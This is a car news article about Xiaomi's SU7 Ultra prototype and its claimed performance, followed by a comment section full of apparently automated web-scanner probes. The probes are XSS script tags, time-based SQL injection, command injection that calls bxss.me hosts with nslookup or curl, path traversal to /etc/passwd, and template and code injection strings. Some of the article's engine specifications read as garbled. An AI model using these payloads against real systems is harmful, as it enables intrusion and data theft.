Last Updated At: 2026-02-16 Author: Sarah
[XNmotors News]
On the evening of July 19th 2024 Xiaomi founder Lei Jun at his annual speech unveiled the Xiaomi full carbon prototype -Xiaomi SU7 Ultra!
![]()
Source: Xiaomi
The car is set to debut in October at the Nürburgring track to start a new record for the fastest four door electric sedan category.
Xiaomi aims to break the lap record previously won by luxury counterpart Porsche Taycan Turbo GT (lap time : 7.07.55 seconds).
![]()
Source: Web & XNmotors
By design, the car is intrinsically different from the Xiaomi SU7 with it having more advanced aerodynamic features. The Xiaomi SU7 Ultra features a massive carbon fiber rear generating a 2,145kg downward force, two huge front vents, enlarged front splitter and side skirts.
![]()
![]()
Source: Xiaomi & XNmotors
The dimensions for the SU7 Ultra are wider then the SU7.
SU7 Ultra: 5260/2064/1406mm L/W/H
SU7: 4997/1963/1440mm
Although, both cars come with the same 3000mm wheel base.
![]()
Source: Xiaomi & XNmotors
The car is said to be equipped with Xiaomi’s new ‘Hyper Engine’ developed with three motors. The two motors being V8 while one being a V6 motor is said to altogether produce a 1548 horsepower with 27200rpm.
![]()
Source: Xiaomi & XNmotors
The car is also expected to be equipped with CATL’s Qilin 2.0 iron phosphate battery generating a maximum output of 1330kW.
Thus, even at a 20% charge producing 880kW. The total expected charge being 897V while supporting a 5.2 Charging rate. Hence, the car maybe recharged in less than 12minutes!
![]()
Source: Xiaomi & XNmotors
Further details revealed state that the car shall have an acceleration from 0-100km/h in just 1.97seconds, 0-200km/h in 5.97 seconds and a top speed of 300km/h in 15 seconds! The maximum speed is reported to be 350km/h while the car is expected to surpass luxury sports car counterparts like Bugatti Chiron.
![]()
Source: Xiaomi & XNmotors
In terms of braking the vehicle comes equipped with an AP Racing High Performance brake Calipers specifically built for racing. Not only that but the brakes made from six piston forged fixed calipers come and a racing brake pad can withstand temperatures as high as 800 degrees.
Moreover, the SU7 ultra also comes with motor reverse technology providing a maximum brake recovery force of 0.6G. Under full braking conditions, the sports car may decelerate to 2.36G while maintaining a braking distance of 25meters.
![]()
Source: Xiaomi & XNmotors
For now, Xiaomi is preparing for its debut at Nürburgring track and the vehicle wont be available to the public until next year, that is, if it is.
Although Xiaomi founder does claim that a simpler cost effective version of the prototype (without the carbon fiber body) maybe made available public eventually.
[ Articles/XNmotor Sarah ]
test comment.
555
18BEQDG2F0
xfs.bxss.me
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
'"
<!--
response.write(9848144*9606063)
'+response.write(9848144*9606063)+'
555
555'"()&%<zzz><ScRiPt >tK59(9739)</ScRiPt>
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
${9999663+9999097}
KnhkRpCs
2KslD93L: IeFfG4Ad
"+response.write(9848144*9606063)+"
555
555
'"()&%<zzz><ScRiPt >tK59(9830)</ScRiPt>
555
555
5559538601
../../../../../../../../../../../../../../etc/passwd
555
555
555
echo rureza$()\ zjxrve\nz^xyu||a #' &echo rureza$()\ zjxrve\nz^xyu||a #|" &echo rureza$()\ zjxrve\nz^xyu||a #
HttP://bxss.me/t/xss.html?%00
'.gethostbyname(lc('hitin'.'cdvtjvfc70881.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(76).chr(121).chr(82).'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555
';print(md5(31337));$a='
".gethostbyname(lc("hitms"."uzlxzxcw5ecc1.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(79).chr(113).chr(83)."
gethostbyname(lc('hituy'.'gktmuxpccec13.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(83).chr(104).chr(78)
&echo yvowdl$()\ crjgck\nz^xyu||a #' &echo yvowdl$()\ crjgck\nz^xyu||a #|" &echo yvowdl$()\ crjgck\nz^xyu||a #
bxss.me/t/xss.html?%00
555
555&echo mkqdde$()\ qfxscb\nz^xyu||a #' &echo mkqdde$()\ qfxscb\nz^xyu||a #|" &echo mkqdde$()\ qfxscb\nz^xyu||a #
";print(md5(31337));$a="
../555
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
"+"A".concat(70-3).concat(22*4).concat(98).concat(84).concat(120).concat(84)+(require"socket" Socket.gethostbyname("hitzm"+"doemqqtd29878.bxss.me.")[3].to_s)+"
|echo jrevjt$()\ nyiurj\nz^xyu||a #' |echo jrevjt$()\ nyiurj\nz^xyu||a #|" |echo jrevjt$()\ nyiurj\nz^xyu||a #
555|echo dqkegq$()\ hefuux\nz^xyu||a #' |echo dqkegq$()\ hefuux\nz^xyu||a #|" |echo dqkegq$()\ hefuux\nz^xyu||a #
expr 9000353298 - 940633
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
(nslookup -q=cname hitddfwkqkgky29c97.bxss.me||curl hitddfwkqkgky29c97.bxss.me))
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
'+'A'.concat(70-3).concat(22*4).concat(119).concat(68).concat(100).concat(80)+(require'socket' Socket.gethostbyname('hitob'+'efejxxsn0e696.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(107).concat(85).concat(97).concat(87)+(require'socket' Socket.gethostbyname('hitoe'+'tfspafdgb4bb5.bxss.me.')[3].to_s)
$(nslookup -q=cname hitlmpepzpiiw377e3.bxss.me||curl hitlmpepzpiiw377e3.bxss.me)
555
555
/etc/shells
&nslookup -q=cname hitqrzxlgwrzzdede5.bxss.me&'\"`0&nslookup -q=cname hitqrzxlgwrzzdede5.bxss.me&`'
555
../../../../../../../../../../../../../../etc/shells
555
redirtest.acx
555
555
&(nslookup -q=cname hitfcmgrgrhvg95604.bxss.me||curl hitfcmgrgrhvg95604.bxss.me)&'\"`0&(nslookup -q=cname hitfcmgrgrhvg95604.bxss.me||curl hitfcmgrgrhvg95604.bxss.me)&`'
555
c:/windows/win.ini
555
555
bxss.me
555
Http://bxss.me/t/fit.txt
555
|(nslookup -q=cname hitklrvbbpjklebb34.bxss.me||curl hitklrvbbpjklebb34.bxss.me)
555
`(nslookup -q=cname hitpcbomtjjevd53eb.bxss.me||curl hitpcbomtjjevd53eb.bxss.me)`
555
555
555
;(nslookup -q=cname hitkkjqbhlfbk8659e.bxss.me||curl hitkkjqbhlfbk8659e.bxss.me)|(nslookup -q=cname hitkkjqbhlfbk8659e.bxss.me||curl hitkkjqbhlfbk8659e.bxss.me)&(nslookup -q=cname hitkkjqbhlfbk8659e.bxss.me||curl hitkkjqbhlfbk8659e.bxss.me)
555
http://bxss.me/t/fit.txt?.jpg
555
555
555&n961882=v966121
|(nslookup${IFS}-q${IFS}cname${IFS}hittzblecfpzrdef92.bxss.me||curl${IFS}hittzblecfpzrdef92.bxss.me)
comments
comments
&(nslookup${IFS}-q${IFS}cname${IFS}hitdefgvvctqb42b1b.bxss.me||curl${IFS}hitdefgvvctqb42b1b.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdefgvvctqb42b1b.bxss.me||curl${IFS}hitdefgvvctqb42b1b.bxss.me)&`'
555
comments/.
555
555
)
!(()&&!|*|*|
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
'"()
555
555
555'&&sleep(27*1000)*atfueq&&'
555
555
555
555"&&sleep(27*1000)*fjztmj&&"
555
555
555'||sleep(27*1000)*wuzsjl||'
555
555
555
555"||sleep(27*1000)*ouxdsn||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555JD1C1wIn'; waitfor delay '0:0:15' --
555-1 OR 341=(SELECT 341 FROM PG_SLEEP(15))--
555-1) OR 924=(SELECT 924 FROM PG_SLEEP(4.381))--
555-1)) OR 249=(SELECT 249 FROM PG_SLEEP(15))--
555wvXF05eY' OR 959=(SELECT 959 FROM PG_SLEEP(15))--
555l06FNVRP') OR 966=(SELECT 966 FROM PG_SLEEP(15))--
555qOSamegw')) OR 394=(SELECT 394 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
@@kfITd
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
555
555
555'"()&%<zzz><ScRiPt >UvAl(9682)</ScRiPt>
'"
555
'"()&%<zzz><ScRiPt >UvAl(9725)</ScRiPt>
<!--
5559377581
555
555
555
555
555
response.write(9117613*9398772)
'+response.write(9117613*9398772)+'
555
"+response.write(9117613*9398772)+"
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
8BoZiCHk
o8vDe2fk: HmM7iJhd
555
echo wbwejg$()\ wuezdw\nz^xyu||a #' &echo wbwejg$()\ wuezdw\nz^xyu||a #|" &echo wbwejg$()\ wuezdw\nz^xyu||a #
&echo ljlurx$()\ hzzuzu\nz^xyu||a #' &echo ljlurx$()\ hzzuzu\nz^xyu||a #|" &echo ljlurx$()\ hzzuzu\nz^xyu||a #
555&echo estrtn$()\ ulqxjq\nz^xyu||a #' &echo estrtn$()\ ulqxjq\nz^xyu||a #|" &echo estrtn$()\ ulqxjq\nz^xyu||a #
555
|echo ezyuyd$()\ owxunk\nz^xyu||a #' |echo ezyuyd$()\ owxunk\nz^xyu||a #|" |echo ezyuyd$()\ owxunk\nz^xyu||a #
${9999087+9999399}
555
555|echo nmxxqc$()\ yjhfdi\nz^xyu||a #' |echo nmxxqc$()\ yjhfdi\nz^xyu||a #|" |echo nmxxqc$()\ yjhfdi\nz^xyu||a #
expr 9000477239 - 921080
555
(nslookup -q=cname hityztumrbffg766d8.bxss.me||curl hityztumrbffg766d8.bxss.me))
$(nslookup -q=cname hittxqvbjzdwfd05b6.bxss.me||curl hittxqvbjzdwfd05b6.bxss.me)
&nslookup -q=cname hittmewkpejws57346.bxss.me&'\"`0&nslookup -q=cname hittmewkpejws57346.bxss.me&`'
&(nslookup -q=cname hitlqggpcqcem35c87.bxss.me||curl hitlqggpcqcem35c87.bxss.me)&'\"`0&(nslookup -q=cname hitlqggpcqcem35c87.bxss.me||curl hitlqggpcqcem35c87.bxss.me)&`'
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
|(nslookup -q=cname hitbpuzkrhjgm95502.bxss.me||curl hitbpuzkrhjgm95502.bxss.me)
555
`(nslookup -q=cname hitsvxrkuunab6dbb0.bxss.me||curl hitsvxrkuunab6dbb0.bxss.me)`
../../../../../../../../../../../../../../etc/passwd
;(nslookup -q=cname hitqayuavlsba26c10.bxss.me||curl hitqayuavlsba26c10.bxss.me)|(nslookup -q=cname hitqayuavlsba26c10.bxss.me||curl hitqayuavlsba26c10.bxss.me)&(nslookup -q=cname hitqayuavlsba26c10.bxss.me||curl hitqayuavlsba26c10.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitvrjwvezllndf8d1.bxss.me||curl${IFS}hitvrjwvezllndf8d1.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitonkjyesnucede12.bxss.me||curl${IFS}hitonkjyesnucede12.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitonkjyesnucede12.bxss.me||curl${IFS}hitonkjyesnucede12.bxss.me)&`'
../../../../../../../../../../../../../../windows/win.ini
"+"A".concat(70-3).concat(22*4).concat(110).concat(84).concat(121).concat(86)+(require"socket" Socket.gethostbyname("hitru"+"kqxuovct73cd7.bxss.me.")[3].to_s)+"
file:///etc/passwd
555
'.gethostbyname(lc('hitmc'.'gruxjryie39d5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(79).chr(120).chr(75).'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
../555
';print(md5(31337));$a='
".gethostbyname(lc("hitpc"."shpoqdbvc8c51.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(83).chr(110).chr(71)."
'+'A'.concat(70-3).concat(22*4).concat(110).concat(65).concat(109).concat(89)+(require'socket' Socket.gethostbyname('hitus'+'qjdfenwo652ae.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(109).concat(73).concat(120).concat(83)+(require'socket' Socket.gethostbyname('hitui'+'tuciqurea2ce7.bxss.me.')[3].to_s)
gethostbyname(lc('hitoa'.'bkptcuyh50ede.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(89).chr(106).chr(84)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
";print(md5(31337));$a="
${@print(md5(31337))}
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
${@print(md5(31337))}\
555
555
/etc/shells
555
'.print(md5(31337)).'
555
555
555
../../../../../../../../../../../../../../etc/shells
redirtest.acx
555
555
555
comments
555&n986457=v932039
555
c:/windows/win.ini
comments
555
comments/.
bxss.me
555
555
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
)
555
555
555
555
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555'&&sleep(27*1000)*fuvgyq&&'
555
555"&&sleep(27*1000)*szfdee&&"
555
555
555'||sleep(27*1000)*njkjdo||'
555
555
555"||sleep(27*1000)*ioiqru||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555shjoo749'; waitfor delay '0:0:15' --
555
555-1 OR 281=(SELECT 281 FROM PG_SLEEP(15))--
555-1) OR 25=(SELECT 25 FROM PG_SLEEP(15))--
555-1)) OR 426=(SELECT 426 FROM PG_SLEEP(15))--
555bKtPiFIa' OR 663=(SELECT 663 FROM PG_SLEEP(15))--
555zkZFhPzc') OR 630=(SELECT 630 FROM PG_SLEEP(15))--
555BFyvvbHq')) OR 491=(SELECT 491 FROM PG_SLEEP(15))--
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
555
'"
555'"()&%<zzz><ScRiPt >onQF(9240)</ScRiPt>
<!--
response.write(9819612*9813457)
'"()&%<zzz><ScRiPt >onQF(9887)</ScRiPt>
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'+response.write(9819612*9813457)+'
LnjNGe5o
eiMx6tPo: ILmNo2PM
"+response.write(9819612*9813457)+"
5559264412
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
${9999102+10000155}
../../../../../../../../../../../../../../windows/win.ini
555
555<esi:include src="http://bxss.me/rpb.png"/>
file:///etc/passwd
555
555
555
../555
555
echo tkxori$()\ wxcuel\nz^xyu||a #' &echo tkxori$()\ wxcuel\nz^xyu||a #|" &echo tkxori$()\ wxcuel\nz^xyu||a #
HttP://bxss.me/t/xss.html?%00
&echo bgywwl$()\ aiipzw\nz^xyu||a #' &echo bgywwl$()\ aiipzw\nz^xyu||a #|" &echo bgywwl$()\ aiipzw\nz^xyu||a #
bxss.me/t/xss.html?%00
redirtest.acx
555
'.gethostbyname(lc('hitqs'.'vuvoqcab0a1a5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(79).chr(105).chr(83).'
555&echo gqjdxe$()\ wpucfu\nz^xyu||a #' &echo gqjdxe$()\ wpucfu\nz^xyu||a #|" &echo gqjdxe$()\ wpucfu\nz^xyu||a #
"+"A".concat(70-3).concat(22*4).concat(109).concat(88).concat(116).concat(84)+(require"socket" Socket.gethostbyname("hitbz"+"feeqrpnuf9e6b.bxss.me.")[3].to_s)+"
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
'+'A'.concat(70-3).concat(22*4).concat(99).concat(76).concat(120).concat(90)+(require'socket' Socket.gethostbyname('hitgh'+'xguayfbk87d42.bxss.me.')[3].to_s)+'
".gethostbyname(lc("hitcb"."rzfxxdjq499b1.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(86).chr(104).chr(87)."
'A'.concat(70-3).concat(22*4).concat(111).concat(68).concat(116).concat(65)+(require'socket' Socket.gethostbyname('hitve'+'exgtcfmi0fc68.bxss.me.')[3].to_s)
gethostbyname(lc('hitrt'.'lpgubdsmb5e12.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(77).chr(122).chr(81)
555
';print(md5(31337));$a='
555
|echo bsqgwu$()\ wlzldh\nz^xyu||a #' |echo bsqgwu$()\ wlzldh\nz^xyu||a #|" |echo bsqgwu$()\ wlzldh\nz^xyu||a #
";print(md5(31337));$a="
555
555|echo ilnotf$()\ jxwpxm\nz^xyu||a #' |echo ilnotf$()\ jxwpxm\nz^xyu||a #|" |echo ilnotf$()\ jxwpxm\nz^xyu||a #
555
expr 9000233243 - 921043
555
(nslookup -q=cname hitxjxscxmhgy4c9e3.bxss.me||curl hitxjxscxmhgy4c9e3.bxss.me))
$(nslookup -q=cname hitmzvisrnmcqebeb2.bxss.me||curl hitmzvisrnmcqebeb2.bxss.me)
555
comments
${@print(md5(31337))}
comments
${@print(md5(31337))}\
555
&nslookup -q=cname hiteqoglufzvof7a86.bxss.me&'\"`0&nslookup -q=cname hiteqoglufzvof7a86.bxss.me&`'
555
&(nslookup -q=cname hitjxfglgnycy88fe0.bxss.me||curl hitjxfglgnycy88fe0.bxss.me)&'\"`0&(nslookup -q=cname hitjxfglgnycy88fe0.bxss.me||curl hitjxfglgnycy88fe0.bxss.me)&`'
555
comments/.
|(nslookup -q=cname hitechmbiubsvc4356.bxss.me||curl hitechmbiubsvc4356.bxss.me)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
`(nslookup -q=cname hitrhbgjhwzecff29a.bxss.me||curl hitrhbgjhwzecff29a.bxss.me)`
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
555'"
;(nslookup -q=cname hitnoasdbsnjw2617f.bxss.me||curl hitnoasdbsnjw2617f.bxss.me)|(nslookup -q=cname hitnoasdbsnjw2617f.bxss.me||curl hitnoasdbsnjw2617f.bxss.me)&(nslookup -q=cname hitnoasdbsnjw2617f.bxss.me||curl hitnoasdbsnjw2617f.bxss.me)
555
'.print(md5(31337)).'
|(nslookup${IFS}-q${IFS}cname${IFS}hitmqyozxpmfaaef96.bxss.me||curl${IFS}hitmqyozxpmfaaef96.bxss.me)
555
@@R7Umm
/etc/shells
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitzoqkriohrl318df.bxss.me||curl${IFS}hitzoqkriohrl318df.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzoqkriohrl318df.bxss.me||curl${IFS}hitzoqkriohrl318df.bxss.me)&`'
)
../../../../../../../../../../../../../../etc/shells
555
c:/windows/win.ini
!(()&&!|*|*|
(select 198766*667891)
555
bxss.me
(select 198766*667891 from DUAL)
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
^(#$!@#$)(()))******
555
555
555
555
555
555&n947517=v946050
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555'&&sleep(27*1000)*jpvifu&&'
555
555"&&sleep(27*1000)*jfjbrb&&"
555'||sleep(27*1000)*tsfijz||'
555"||sleep(27*1000)*bidizm||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555-1; waitfor delay '0:0:15' --
555
555-1); waitfor delay '0:0:15' --
555
555-1 waitfor delay '0:0:15' --
555
555HNcoobP5'; waitfor delay '0:0:15' --
555
555-1 OR 410=(SELECT 410 FROM PG_SLEEP(15))--
555
555-1) OR 817=(SELECT 817 FROM PG_SLEEP(15))--
555
555-1)) OR 785=(SELECT 785 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555SDYUmgOu' OR 505=(SELECT 505 FROM PG_SLEEP(15))--
555
555
555Z3HKgikJ') OR 236=(SELECT 236 FROM PG_SLEEP(15))--
555
555snhrjRZy')) OR 71=(SELECT 71 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
@@arTRU
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
1
555
1
1
555'"()&%<zzz><ScRiPt >oVA3(9059)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >oVA3(9558)</ScRiPt>
555
5559039323
555
bfg10665<s1﹥s2ʺs3ʹhjl10665
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >oVA3(9570)</ScRiPt>
555
555<WJWPCO>CLNCN[!+!]</WJWPCO>
555
555
555<script>oVA3(9349)</script>
555
555<script>oVA3(9397)</script>9397
555
555<ScR<ScRiPt>IpT>oVA3(9685)</sCr<ScRiPt>IpT>
555
555<ScRiPt >oVA3(9858)</ScRiPt>
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9073></ScRiPt>
555<
Test